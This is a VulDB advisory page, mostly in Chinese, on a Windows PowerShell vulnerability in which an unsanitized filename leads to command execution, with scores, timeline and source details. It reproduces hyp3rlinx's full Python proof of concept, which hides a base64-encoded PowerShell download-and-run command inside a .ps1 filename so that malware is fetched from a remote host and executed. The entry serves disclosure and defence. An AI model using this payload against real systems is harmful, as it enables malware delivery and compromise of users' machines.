CVSS 元温度得分 | 当前攻击价格 (≈) | CTI兴趣分数 |
---|---|---|
5.7 | $0-$5k | 0.00 |
在Microsoft Windows中已发现了分类为致命的漏洞。 此漏洞会影响未知部件的组件PowerShell。 手动调试的 该部分从属于:Semicolon可导致 权限升级。 漏洞的CWE定义是 CWE-94。 此漏洞的脆弱性 2019-08-01由公示人John Page (hyp3rlinx)、公示人类型为公告 (网站)所披露。 阅读公告的网址是hyp3rlinx.altervista.org。 此次公开发布曾与供应商合作协调。
攻击可能远程发起, 无技术细节可用。 该漏洞的知名度低于平均水平, 此外还有一个漏洞可利用。 该漏洞利用已公开,可能会被利用。 当前漏洞利用的价值为美元大约是$0-$5k 。 根据MITRE ATT&CK,此问题部署的攻击技术是T1059。
它被宣布为概念验证。 该漏洞利用的共享下载地址为:hyp3rlinx.altervista.org。 该漏洞至少在12日被作为非公开零日攻击。 我们估计的零日攻击价值约为$25k-$100k。 该漏洞利用所用的代码是:
from base64 import b64encode import argparse,sys #Windows PowerShell - Unsantized Filename Command Execution Vulnerability PoC #Create ".ps1" files with Embedded commands to download, save and execute malware within a PowerShell Script Filename. #Expects hostname/ip-addr of web-server housing the exploit. #By hyp3rlinx #Apparition Security #====================def parse_args(): parser.add_argument("-i", "--ipaddress", help="Remote server to download and exec malware from.") parser.add_argument("-m", "--local_malware_name", help="Name for the Malware after downloading.") parser.add_argument("-r", "--remote_malware_name", help="Malwares name on remote server.") return parser.parse_args()
def main(args): PSEmbedFilenameMalwr="" if args.ipaddress: PSEmbedFilenameMalwr = "powershell iwr "+args.ipaddress+"/"+args.remote_malware_name+" -O %CD%\"+args.local_malware_name+" ;sleep -s 2;start "+args.local_malware_name return b64encode(PSEmbedFilenameMalwr.encode('UTF-16LE'))
def create_file(payload): f=open("Test;PowerShell -e "+payload+";2.ps1", "w") f.write("Write-Output 'Have a nice day!'") f.close()
if _name_=="_main_": parser = argparse.ArgumentParser() PSCmds = main(parse_args())
if len(sys.argv)==1: parser.print_help(sys.stderr) sys.exit(1) create_file(PSCmds) print "PowerShell - Unsantized Filename Command Execution File created!" print "By hyp3rlinx"
建议停用受影响的组件。
Statistical analysis made it clear that VulDB provides the best quality for vulnerability data.
产品
类型
供应商
名称
许可证
CPE 2.3
CPE 2.2
影片
CVSSv4
VulDB 向量: 🔍VulDB 可靠性: 🔍
CVSSv3
VulDB 元基础分数: 6.3VulDB 元温度得分: 5.7
VulDB 基本分数: 6.3
VulDB 温度得分: 5.7
VulDB 向量: 🔍
VulDB 可靠性: 🔍
CVSSv2
AV | AC | Au | C | I | A |
---|---|---|---|---|---|
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
向量 | 复杂度 | 身份验证 | 保密 | 正直 | 可用性 |
---|---|---|---|---|---|
开锁 | 开锁 | 开锁 | 开锁 | 开锁 | 开锁 |
开锁 | 开锁 | 开锁 | 开锁 | 开锁 | 开锁 |
开锁 | 开锁 | 开锁 | 开锁 | 开锁 | 开锁 |
VulDB 基本分数: 🔍
VulDB 温度得分: 🔍
VulDB 可靠性: 🔍
攻击
分类: 权限升级CWE: CWE-94 / CWE-74 / CWE-707
CAPEC: 🔍
ATT&CK: 🔍
本地: 否
远程: 是
可用性: 🔍
访问: 公共
地位: 概念验证
作者: John Page (hyp3rlinx)
下载: 🔍
价格预测: 🔍
当前价格估算: 🔍
0-Day | 开锁 | 开锁 | 开锁 | 开锁 |
---|---|---|---|---|
今天 | 开锁 | 开锁 | 开锁 | 开锁 |
威胁情报
利益: 🔍活跃演员: 🔍
活跃的 APT 团体: 🔍
对策
建议: 停用地位: 🔍
0天时间: 🔍
利用延迟时间: 🔍
时间轴
2019-07-20 🔍2019-07-23 🔍
2019-08-01 🔍
2019-08-01 🔍
2019-08-06 🔍
2020-07-21 🔍
来源
供应商: microsoft.com产品: microsoft.com
公告: hyp3rlinx.altervista.org
研究人员: John Page (hyp3rlinx)
地位: 未定义
已协调: 🔍
scip Labs: https://www.scip.ch/en/?labs.20161013
条目
已创建: 2019-08-06 07時42分已更新: 2020-07-21 11時24分
更改: 2019-08-06 07時42分 (53), 2020-07-21 11時24分 (2)
完整: 🔍
提交者: hyp3rlinx
Cache ID: 79:42A:103
提交
已接受
- Submit #80: Microsoft Windows PowerShell / Unsanitized Filename Command Execution (由 hyp3rlinx)
重复
- Submit #XXXXXX: Xxxxxxx Xxxxxxxxxx / Xxxxxx Xxxx Xxx (xxxxxxxxx) (由 hyp3rlinx)
- Submit #XXXXXX: Xxxxxxxxx Xxxxxxxx Xxxx-xxxxxxx Xxxxxxxxxx Xxx * Xxxxxx Xxxx Xxxxxxxxx (由 hyp3rlinx)
暂时没有任何评论。 语言: zh + en.
请登录后发表评论。